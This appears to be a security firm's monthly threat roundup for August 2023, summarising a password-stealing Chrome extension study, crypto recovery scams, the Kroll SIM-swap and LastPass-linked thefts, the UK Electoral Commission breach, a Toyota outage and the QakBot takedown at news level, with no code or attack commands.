August has been full of crypto currency activity and mass data breaches – seeing millions of personal records stolen from the UK, and millions of dollars stolen from crypto wallets and investors.
New/Improved Techniques
Chrome Info Stealer Proof-of-Concept
Researchers at the University of Wisconsin-Madison have discovered that many websites incorrectly expose user input fields in HTML source code and have created a proof of concept (POC) Google Chrome extension to capture passwords. Leveraging dynamic code injection (where malicious code is loaded from a remote server), they were able to bypass the static code Chrome Web Store review process and discovered that around 12.5% (17,300) of extensions on the Chrome Web Store have the necessary permissions to exploit these vulnerabilities and identified 190 extensions that accessed password fields directly (i.e., password managers).
The POC extension was run against the top 10,000 domains and the team discovered that there are two main systematic issues at play. Firstly, the browser permission models lack a security boundary between the web page and the extension, allowing the extension to freely interact and manipulate HTML page elements, violating the security principals of least privilege and complete mediation. Secondly, there appears to be a systematic issue in website password field security, as the majority of websites offer easily bypassed, or no security on input fields. Even in cases where JavaScript based obfuscation is used, an element substitution attack can bypass this protection – meaning the extension can see passwords as plain text.
Cryptocurrency Recovery Scams
The FBI released a public service announcement this month warning of an increase in cryptocurrency recovery scams, that exploit victims who have lost cryptocurrency to fraud, scams, and other theft. Over $2.5 billion USD was lost by victims of cryptocurrency frauds alone in the US in 2022, driving demand for recovery services.
The fraudulent recovery services operate in an eerily similar way to fraudsters and thieves, using a mixture of legitimate advertising, fake social media accounts, comments section of videos and news articles relating to cryptocurrency, and even bots who respond to tweets posting cryptocurrency to drive initial interactions. After the initial interaction, and some trust is built with the victim, the scammer will attempt to get the victim to pay in advance for the recovery. After receiving payment, the scammers will usually cut communications or attempt to get the victim to pay additional money, citing an additional resource requirement to finish the report. The FBI warned that the scammers will often purport to be affiliated with law enforcement or legal services.
Attacks / Threats
[US] Crypto Platform Data Breach Linked to Kroll Employee SIM-swap
A data breach affecting three major bankrupt cryptocurrency platforms has been linked back to a Kroll employee who was the victim of a SIM-swapping attack. SIM-swapping is a technique primarily used to bypass MFA methods associated with a mobile number, in this case a T-Mobile employee performed the swap without proper authority or contact with Kroll. At this time, it is unclear if the T-Mobile employee was directly involved, or if they were tricked – historically, either are possible
As a result of the SIM swap, the threat actor gained access to files containing PII of bankruptcy claimants for FTX, BlockFi, and Gensis, who had contracted Kroll to create a ‘claims administration’ platform to manage the return of funds to claimants.
[Global] $35 Million in Stolen Cryptocurrency – LastPass Breach
Security researchers have been able to identify a reliable set of clues linking the theft of $35 Million USD lifted from 150 wallets to the LastPass breach from November 2022. Since the breach there have been at least 150 heists targeting long time crypto investors, which are often lacking the collateral damage we expect to see when an adversary gains access (i.e., email/mobile number takeover), with the cryptocurrencies being extracted to the same blockchain addresses.
The main underlying cause, and mitigation step is relatively simple: It is not possible to change a crypto wallet private key, so the mitigation requires moving your funds to a new wallet – a step none of these victims took. This factor alone, has allowed the other known weaknesses in pre-breach vault encryption (primarily plain text comments, and a lack of enforcement for encryption iterations) to be abused by malicious actors to identify valuable vaults, and breach these via brute force in a reasonable amount of time.
[UK] Cyber-Attack on Electoral Commission Systems
The UK Electoral Commission has announced a data breach from October 2022, where malicious actors had gained access to servers holding emails, control systems, and copies of electoral registers. The investigation revealed that the actors first gained access to the systems in August 2021. The electoral registers contained names, addresses, phone numbers, dates of birth (in the form of the date when the person turns 18) and email addresses for around 40 million voters who were registered to vote between 2014 and 2022.
The electoral commission has released an impact statement:
“According to the risk assessment used by the Information Commissioner’s Office to assess the harm of data breaches, the personal data held on the electoral registers – typically name and address – does not in itself present a high risk to individuals. It is possible however that this data could be combined with other data in the public domain, such as that which individuals choose to share themselves, to infer patterns of behaviour or to identify and profile individuals”.
This is in line with how the New Zealand privacy commission views this type of data.
[Japan] Toyota: 36-hour Outage of 14 Manufacturing Plants
An issue caused by a full server storage during a scheduled update caused Toyota to shut down operations at 14 of their manufacturing plants for 36 hours in late August. Toyota use a just-in-time production system, where components and parts arrive at the production line as they are needed, a system which used a database on the full server, effectively halting operations at all plants using this system.
Unfortunately, the backup for this database was hosted on the same server, meaning failover could not occur. The issue was eventually resolved by migrating the database to a larger server. The outage represented around a third of Toyota’s total production capacity, which has been estimated to have cost the company $365 million in loses.
[Global] QakBot Botnet taken by FBI
Operation Duck Hunt, a multinational law enforcement initiative led by the FBI involving France, Germany, Latvia, the Netherlands, Romania, United Kingdom and the United States was successful in seizing 52 servers employed by the QakBot malware operators to sustain their network infrastructure.
After US courts provided a warrant in late August, law enforcement were able to search US-based machines infected with the malware. They seized server lists, IP addresses, and routing information used by QakBot admins, and delivered their own custom uninstaller to free the victim devices from the QakBot botnet. Only days later additional warrants were issued, allowing law enforcement to seize servers in nearly 30 countries, and 20 crypto-currency wallets worth $8.6 million USD. The effort freed 700,000 victim computers from the control, and law enforcement indicated they had enough information to provide search notifications for victims who’s computers had been searched as a result of the investigation.
The QakBot malware has been active since 2007, and infects Windows computers via phishing. Once the victim has been tricked into following the malicious link or opening the malicious document, the QakBot loader is installed on the device. From there, a variety of other malware is installed, commonly keyloggers to steal user credentials and financial information. Their malware has been associated with ransomware groups, usually as initial ingress from a credential theft using QakBok, indicating they may have an affiliate structure or sell credentials.
It remains to be seen if this will be the end of the QakBot operation.
[UK] Government Issues Notification: Voter Registration Not a Scam
Each year across the UK, councils contact residents asking them to update their details on the electoral register, with notices being delivered through a mixture of traditional mail and email. The notices provide a security code that needs to be entered on the electoral website – householdresponse.com – which is where the issues begin.
Not only does the site not have the expected top-level domain for a government website (.gov), but the site itself has the appearance of a hastily thrown together scam site. Council representatives have been replying to tweets to assure users of the legitimacy of these emails, with many council websites putting up front end messages providing this information.
Residents who do not update their details, are liable for a thousand pound fine.